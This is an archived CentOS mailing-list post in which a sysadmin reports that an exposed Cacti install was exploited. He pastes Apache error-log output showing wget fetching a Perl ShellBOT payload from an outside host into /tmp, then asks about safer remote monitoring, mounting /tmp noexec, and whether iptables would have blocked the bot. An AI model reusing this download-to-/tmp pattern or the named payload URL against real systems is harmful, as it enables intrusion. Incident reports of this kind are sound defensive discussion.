Suggested way to remotely monitor servers and networks these days?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]



Hi folks,

I'm just wondering what is the recommended way of monitoring servers and networks remotely. My current setup is to install and configure cacti and nagios. I've set these up to require SSL. This way, I can easily go to them and login from wherever I am and monitor (almost) everything I need to monitor.

The problem is that leaving cacti open was the most stupid thing I've done. After checking /var/log/httpd/error_log, I saw that someone exploited a cacti php file and the result was:

--08:13:11--  http://psaico.host.sk/desk.pl
           => `/tmp/desk.pl'
Resolving psaico.host.sk... 62.168.109.150
Connecting to psaico.host.sk|62.168.109.150|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,144 (20K) [text/x-perl]

    0K .......... .........                                  100%   28.26 KB/s

08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144]

which immediately downloaded ShellBOT to /tmp and executed it. It was a good thing I caught this as early as I did. So, what's everyone elses solution these days? Or is it simply a matter of creating a /tmp partition and mounting it noexec?

On a side note... anyone with experience with ShellBOT? From research, it seems to attempt to connect to an IRC server upon running. So if my outgoing connections are secured by iptables, can I assume it never got connected at all? I'll probably try this out someday but just looking for a quick experienced answer.

Thanks!

dex
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos

[Index of Archives]     [CentOS]     [CentOS Announce]     [CentOS Development]     [CentOS ARM Devel]     [CentOS Docs]     [CentOS Virtualization]     [Carrier Grade Linux]     [Linux Media]     [Asterisk]     [DCCP]     [Netdev]     [Xorg]     [Linux USB]
  Powered by Linux